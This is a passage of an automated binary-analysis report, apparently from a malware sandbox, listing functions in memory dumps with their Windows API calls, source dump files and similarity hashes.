                                                                                                                • API ID: LibraryLoad$AddressEncodeHandleInfoLocaleModulePointerProc__getptd_noexit__snprintf_s__vsnwprintf_s_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3305543295-0
                                                                                                                • Opcode ID: cbfe86aa5c559c780a6d0e4456b198e488bb4932876cc5d464acc8799a468687
                                                                                                                • Instruction ID: b94d0417879c31f89785797d99b2c72dbd19c379f9e688f7ec698d466cbc76f8
                                                                                                                • Opcode Fuzzy Hash: cbfe86aa5c559c780a6d0e4456b198e488bb4932876cc5d464acc8799a468687
                                                                                                                • Instruction Fuzzy Hash: 5921BB71D3125A6BDB15BFA8DC85EBE77ACAF15710F4001A5EA04A71C1EA74AA40C7A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01264909, Relevance: 4.6, APIs: 3, Instructions: 72registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000001,012AA080,00000000,?,?), ref: 0126494B
                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 0126496C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 012649B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 7c7973d15f398babb3f42aceee3bc15a449a87f66e7437814403795a0483b178
                                                                                                                • Instruction ID: fa85b36304303112e82bc78892f3cb543e84712f9331a0d054bfae1dfd56a3bf
                                                                                                                • Opcode Fuzzy Hash: 7c7973d15f398babb3f42aceee3bc15a449a87f66e7437814403795a0483b178
                                                                                                                • Instruction Fuzzy Hash: 0F218071E61206EFDF14DF98D845BAEB7B8FF04316F10416EE55AE6280E7705684CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006E56, Relevance: 4.6, APIs: 3, Instructions: 72memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateH_prolog3_catch_memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1361164945-0
                                                                                                                • Opcode ID: 6c100226fbe301f1dc254b886d9aba315a75970263db0ed6d1070a5ca575850b
                                                                                                                • Instruction ID: 1c7365fc5e67add406d2abf5436b25cbe3846440203394506c47d579935b9266
                                                                                                                • Opcode Fuzzy Hash: 6c100226fbe301f1dc254b886d9aba315a75970263db0ed6d1070a5ca575850b
                                                                                                                • Instruction Fuzzy Hash: 2421F975B04342DFFB20CF68D84056EB7F6EF88690B30062DE9529B285DB70BD4087A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10008264, Relevance: 4.6, APIs: 3, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000826B
                                                                                                                  • Part of subcall function 100083DB: __EH_prolog3.LIBCMT ref: 100083E2
                                                                                                                • _free.LIBCMT ref: 100082EF
                                                                                                                • _free.LIBCMT ref: 1000830E
                                                                                                                  • Part of subcall function 1000836B: _free.LIBCMT ref: 10008383
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _free$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 2332700424-0
                                                                                                                • Opcode ID: b9ca216a507594e430ca19db9d2b8702210b43001df376c66d680759814d9a98
                                                                                                                • Instruction ID: 8d37a2da10f87b5337b72f7370f9cba7069e7fe05c5efe2d2772a4a03a45c5da
                                                                                                                • Opcode Fuzzy Hash: b9ca216a507594e430ca19db9d2b8702210b43001df376c66d680759814d9a98
                                                                                                                • Instruction Fuzzy Hash: 322119B5D007059FCB20CFA9D88089EFBF1FF48310B15852EE895A7751DB74AA40CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012613B0, Relevance: 4.6, APIs: 3, Instructions: 66windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InitCommonControlsEx.COMCTL32(?,DDD5D539), ref: 012613F0
                                                                                                                  • Part of subcall function 01264059: __EH_prolog3.LIBCMT ref: 01264060
                                                                                                                  • Part of subcall function 01264F97: _free.LIBCMT ref: 01264FA0
                                                                                                                  • Part of subcall function 01264F97: _free.LIBCMT ref: 01264FB3
                                                                                                                • _memset.LIBCMT ref: 01261421
                                                                                                                • LoadIconW.USER32(?,00000080), ref: 0126145C
                                                                                                                  • Part of subcall function 012676C9: __EH_prolog3_catch.LIBCMT ref: 012676D0
                                                                                                                  • Part of subcall function 012676C9: FindResourceA.KERNEL32(?,?,00000005), ref: 0126770C
                                                                                                                  • Part of subcall function 012676C9: LoadResource.KERNEL32(?,00000000), ref: 01267714
                                                                                                                  • Part of subcall function 012676C9: LockResource.KERNEL32(?,00000028,0126147C), ref: 01267724
                                                                                                                  • Part of subcall function 0126721F: __EH_prolog3.LIBCMT ref: 01267226
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Resource$H_prolog3Load_free$CommonControlsFindH_prolog3_catchIconInitLock_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4218141500-0
                                                                                                                • Opcode ID: 8dc10c3330cc7ccbc2d4850ef64e4f524a18e3870bf18ebdfba2125606ca5532
                                                                                                                • Instruction ID: 2a453f18bd4deddeec42049cba2327db09bf553191ddf36f5cf5e7e93d2e038b
                                                                                                                • Opcode Fuzzy Hash: 8dc10c3330cc7ccbc2d4850ef64e4f524a18e3870bf18ebdfba2125606ca5532
                                                                                                                • Instruction Fuzzy Hash: 2A21BEB1E1031ADFDB20EFA4D909BAEB7B8FB14714F0001A9E519A72C0EB755A44CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1008094B, Relevance: 4.5, APIs: 3, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 10080963
                                                                                                                  • Part of subcall function 1007FDFC: __FF_MSGBANNER.LIBCMT ref: 1007FE13
                                                                                                                  • Part of subcall function 1007FDFC: __NMSG_WRITE.LIBCMT ref: 1007FE1A
                                                                                                                  • Part of subcall function 1007FDFC: RtlAllocateHeap.NTDLL(014D0000,00000000,00000001,00000001,?,?,?,1007F6B1,00000001,00000000,?,?,?,1007F5DA,?), ref: 1007FE3F
                                                                                                                • std::exception::exception.LIBCMT ref: 10080981
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10080996
                                                                                                                  • Part of subcall function 10082C9B: RaiseException.KERNEL32(?,?,10061219,?,?,E05FA6D8,?,?,?,?,10061219,?,100CCC84,E05FA6D8), ref: 10082CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074076210-0
                                                                                                                • Opcode ID: 73612b6a3d118f46db4590aca4daa1a766fe7dc1289415518b05fe42ecb6c365
                                                                                                                • Instruction ID: 20bf9eb002cf6f3ae85363ca1dd48a210ae43f4b500d659f2a8a3c8b5ded0584
                                                                                                                • Opcode Fuzzy Hash: 73612b6a3d118f46db4590aca4daa1a766fe7dc1289415518b05fe42ecb6c365
                                                                                                                • Instruction Fuzzy Hash: C3E0657DD0010EB7DF00DFA4CC51AEE7B78FB00250F508556F855A6192EBB1AA50D691
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100086D0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3
                                                                                                                • String ID: u
                                                                                                                • API String ID: 431132790-4067256894
                                                                                                                • Opcode ID: 6346f8a5e201c22f06957b738a78a89b670cbc9f76c4d83e68aa6c9404dae68e
                                                                                                                • Instruction ID: 020ff0c4fcac42fc8db0d11ec9ae59ea73e5243ac0940dbfac119407cd915dd1
                                                                                                                • Opcode Fuzzy Hash: 6346f8a5e201c22f06957b738a78a89b670cbc9f76c4d83e68aa6c9404dae68e
                                                                                                                • Instruction Fuzzy Hash: 24712774D0464ADFEB05CF55C48079DBBF1FF48390F24816AE885AB249CB74AA82CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01262590, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 012625D5
                                                                                                                  • Part of subcall function 012864EA: KiUserExceptionDispatcher.NTDLL(?,?,?,?,00000000), ref: 0128653F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: DispatcherExceptionException@8ThrowUser
                                                                                                                • String ID: #
                                                                                                                • API String ID: 2513928553-1885708031
                                                                                                                • Opcode ID: 92001846f746b70aef47fa93cf2ce8e083c86f3b1a3fe5b10719ab39cfd36102
                                                                                                                • Instruction ID: db81d67fc851de42b6073177926582094f196fb942195ea332ff82182338bfbe
                                                                                                                • Opcode Fuzzy Hash: 92001846f746b70aef47fa93cf2ce8e083c86f3b1a3fe5b10719ab39cfd36102
                                                                                                                • Instruction Fuzzy Hash: CD018FB4E2161ADBCB21EB998854B6F76ACFB54B14F800128E801972C0D7789E8047D1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126F015, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • InitCommonControlsEx.COMCTL32(00000008,012A5888,00000010,0126DEC6,00000008,00000000,?,0126A055,00000008,00080000,?,00000000,00000000,00000000,?,00000000), ref: 0126F064
                                                                                                                  • Part of subcall function 0126294A: OutputDebugStringA.KERNEL32(IsolationAware function called after IsolationAwareCleanup,-00000034,?,01262A26,00000000,012A4F00,00000010,0127ED09,?,?,?,0129BD34,?,?,0000000C,0127ED62), ref: 0126295E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CommonControlsDebugInitOutputString
                                                                                                                • String ID: InitCommonControlsEx
                                                                                                                • API String ID: 650261710-2357626986
                                                                                                                • Opcode ID: 168a22630618587b9a7a8ddecfaaf89fd66fef51e8719511bae0cd44d8efd684
                                                                                                                • Instruction ID: 73aa31218baddbf7008896d25a85cedb7ae350379362eb93eb8666a9d6a32fea
                                                                                                                • Opcode Fuzzy Hash: 168a22630618587b9a7a8ddecfaaf89fd66fef51e8719511bae0cd44d8efd684
                                                                                                                • Instruction Fuzzy Hash: 64F0BB71C20726EBCF22EBAD99105ADB67CBF94B60F11411AE510A31C4C774C582CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01261E40, Relevance: 3.2, APIs: 2, Instructions: 194memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VirtualFree.KERNELBASE(00004000,?,00004000,00000000,?,012AB8F0), ref: 01261ECE
                                                                                                                • VirtualProtect.KERNELBASE(?,?,?,?,00000000,?,012AB8F0), ref: 01261F86
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$FreeProtect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2581862158-0
                                                                                                                • Opcode ID: 548a77444d9e88a29e376b5ac832c5bf739b6962e23902dd83a48edc36d8ab90
                                                                                                                • Instruction ID: 6d29b908dba5c71783059826fd0bd3a4a4b85d3d0717a131951a06087b233a03
                                                                                                                • Opcode Fuzzy Hash: 548a77444d9e88a29e376b5ac832c5bf739b6962e23902dd83a48edc36d8ab90
                                                                                                                • Instruction Fuzzy Hash: BA31B33071120A8BEB25CF0DE980B79B7A9EB96304F804169EA05DB2D5D775FDA5CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126A270, Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                • UnhookWindowsHookEx.USER32(?), ref: 0126A29A
                                                                                                                • DefWindowProcA.USER32(00000028,00000360,?,?,00000028,00000000,?,Function_00006D6E), ref: 0126A2FD
                                                                                                                  • Part of subcall function 01269C92: __EH_prolog3_catch_GS.LIBCMT ref: 01269C99
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3H_prolog3_catch_HookProcUnhookWindowWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 2533299859-0
                                                                                                                • Opcode ID: fa8f28b516a3cb2617871089dfc39bbc2e1ecb456498e8c4f652c47a4ecf6ef6
                                                                                                                • Instruction ID: 40697aa6e14cf42cd41466a64be1eac4ca77020fdfd9f1997a6b11104cc42d50
                                                                                                                • Opcode Fuzzy Hash: fa8f28b516a3cb2617871089dfc39bbc2e1ecb456498e8c4f652c47a4ecf6ef6
                                                                                                                • Instruction Fuzzy Hash: 2211C632471626AFEF225F64ED08BAB7AACEF09225F004415F655920D0C776C5D0CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1008041E, Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __lock_file_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 26237723-0
                                                                                                                • Opcode ID: 9853735a26c5091c5fdcc05e91e26ae16200d0898e1b1b233f6a3e19e98152cc
                                                                                                                • Instruction ID: 2be4573a3f0afdfb962ec17df6ce086c4ca5f0182d5bb46ca01e14d7f5a97c7c
                                                                                                                • Opcode Fuzzy Hash: 9853735a26c5091c5fdcc05e91e26ae16200d0898e1b1b233f6a3e19e98152cc
                                                                                                                • Instruction Fuzzy Hash: 7001A2B5C40649EBCF91DFA49C0598E3BB1FF913A0F108217FA34561A1E7329A21DF91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100808D4, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 100865AC: __getptd_noexit.LIBCMT ref: 100865AC
                                                                                                                • __lock_file.LIBCMT ref: 10080919
                                                                                                                  • Part of subcall function 10080F58: __lock.LIBCMT ref: 10080F7B
                                                                                                                • __fclose_nolock.LIBCMT ref: 10080924
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.285888122.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.285875258.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.285982320.00000000100A8000.00000002.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286024378.00000000100D0000.00000004.00000001.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.286047522.00000000100DB000.00000002.00000001.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 4cfd627b346c20f48db3dca297aaaa5774db6d40337acd73fa7b3bd8fc187ae6
                                                                                                                • Instruction ID: 254c1a6e105cbd7b76ea88f51b2162fa527f989aa74fee9d6720ae797e58d72b
                                                                                                                • Opcode Fuzzy Hash: 4cfd627b346c20f48db3dca297aaaa5774db6d40337acd73fa7b3bd8fc187ae6
                                                                                                                • Instruction Fuzzy Hash: CDF0B475C01A0D9AEB90DB758802B5E76E0FF41374F11820BF4A8AB1C2CB7CAA019F56
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126A10E, Relevance: 3.0, APIs: 2, Instructions: 32threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01270689: __EH_prolog3.LIBCMT ref: 01270690
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0126A136
                                                                                                                • SetWindowsHookExA.USER32 ref: 0126A146
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prolog3HookThreadWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 841563119-0
                                                                                                                • Opcode ID: 5d7f5a34ddd9918aa34933246c03a796166fe4640c85f64ac04eb4c6ea46e42f
                                                                                                                • Instruction ID: acdbedc984fdd6ac582796c8060e5756e5006ad2a2d13e34d1a553a9d02b96f9
                                                                                                                • Opcode Fuzzy Hash: 5d7f5a34ddd9918aa34933246c03a796166fe4640c85f64ac04eb4c6ea46e42f
                                                                                                                • Instruction Fuzzy Hash: 70F0AE716507079BDA306F9A9C097277A9CDB50B61F14016DE705976C0CA70D4C487F5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0127F673, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE(00000000,00000000,?,01296BE5,?,?,?,?,?,?,00000000,?,012837E8,01260000,00000000,00000000), ref: 0127F67F
                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,01296BE5,?,?,?,?,?,?,00000000,?,012837E8,01260000,00000000,00000000), ref: 0127F687
                                                                                                                  • Part of subcall function 0127F6CF: GetModuleFileNameA.KERNEL32(?,?,00000104,?,?,?), ref: 0127F70A
                                                                                                                  • Part of subcall function 0127F6CF: PathFindExtensionA.KERNELBASE(?,?,?,?), ref: 0127F724
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ExtensionFileFindModuleNamePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1764437154-0
                                                                                                                • Opcode ID: b2435c435c6972b4adbacc322275c5a61469f4a3ca334227c77e9b1c3159eea4
                                                                                                                • Instruction ID: d409a9f5fbfca276423ed794fda03ce4e811b8865bf7da75281e80c8ef6962a6
                                                                                                                • Opcode Fuzzy Hash: b2435c435c6972b4adbacc322275c5a61469f4a3ca334227c77e9b1c3159eea4
                                                                                                                • Instruction Fuzzy Hash: 07F0B4729312164FEB10FF78C504B2A7B9CAF54314F04405AE558CB251DA32D881CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0126B0BC, Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DefWindowProcA.USER32(?,?,?,?), ref: 0126B0F3
                                                                                                                • CallWindowProcA.USER32 ref: 0126B0FC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.283909709.0000000001261000.00000020.00020000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                • Associated: 00000001.00000002.283885818.0000000001260000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283942193.0000000001299000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283960003.00000000012AA000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.283969432.00000000012AC000.00000008.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284553157.0000000001388000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284568622.000000000138C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000001.00000002.284595520.000000000138D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ProcWindow$Call
                                                                                                                • String ID:
                                                                                                                • API String ID: 2316559721-0
                                                                                                                • Opcode ID: 3a74640ffd96f0cc14e8c74e9a6cea36e1af4ff9431d996243df642458cb8853
                                                                                                                • Instruction ID: d7c5cba9b00e2e1d21bc1f8d6eb2981249b4919e29898668a431bc0cedb951d0
                                                                                                                • Opcode Fuzzy Hash: 3a74640ffd96f0cc14e8c74e9a6cea36e1af4ff9431d996243df642458cb8853
                                                                                                                • Instruction Fuzzy Hash: 61F0DA36210205EFDF224FA9D809EAA7FA9FF08355B048419FA5686560D773D4A0EF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01266B4F, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
